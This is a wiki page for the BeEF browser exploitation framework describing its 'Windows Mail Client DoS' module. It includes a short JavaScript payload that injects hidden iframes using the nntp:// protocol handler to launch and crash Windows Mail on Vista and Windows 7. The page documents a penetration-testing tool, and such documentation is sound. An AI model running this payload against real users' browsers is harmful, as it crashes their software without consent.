Skip to content

Module: Windows Mail Client DoS

Jump to bottom
Haoxi Tan edited this page Jan 9, 2020 · 2 revisions

Summary

  • Objective: Crash Windows Mail (on Vista and Win7 SP2) remotely

  • Authors: bcoles

  • Browsers: Firefox

  • Code

Internal Working

This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).

The protocol handler used will be nntp://

var protocol_iframe;
for(var i=1;i<=10;i++) {
        protocol_iframe = document.createElement('iframe');
        protocol_iframe.setAttribute('src',   'nntp://127.0.0.1:119//');
        protocol_iframe.setAttribute('id',    'winmail'+i);
        protocol_iframe.setAttribute('style', 'display:none');
        winmail_container.contentWindow.document.body.appendChild(protocol_iframe);
}

References

The port for NNTP (119) will be blocked in newer versions of Chrome and Firefox https://e1tips.com/2014/03/17/allow-firefox-chrome-to-access-restricted-ports/

Feedback

User Guide

I. Introduction   |   II. Basic Utilization   |   III. Advanced Utilization   |   IV. Development   |   V. References

Community

Blog   |   Code   |   Youtube   |   Twitter

I - Starting BeEF

  1. Introducing BeEF
  2. Installation
  3. Basics
  4. Troubleshooting

II - Basic Utilization

  1. Configuration
  2. Interface
  3. Information Gathering
  4. Social Engineering
  5. Network Discovery
  6. Metasploit
  7. Tunneling
  8. XSS Rays
  9. Persistence
  10. Creating a Module
  11. Geolocation
  12. Using-BeEF-With-NGROK

III - Advanced Utilization

  1. RESTful API
  2. Autorun Rule Engine
  3. Notifications
  4. Console
  5. WebRTC Extension

IV - Development

  1. Contributing
  2. ActiveRecord
  3. Development Organization
  4. Architecture
  5. BeEF Javascript API
  6. Step By Step Module Creation
  7. Creating a New Extension
  8. BeEF Testing
  9. Browser & OS Compatibility
  10. Database Schema
  11. Development Milestones
  12. Command Module Config
  13. Command Module API

V - References

  1. FAQ
  2. Other
  3. References
  4. Modules
  5. Release Notes
Clone this wiki locally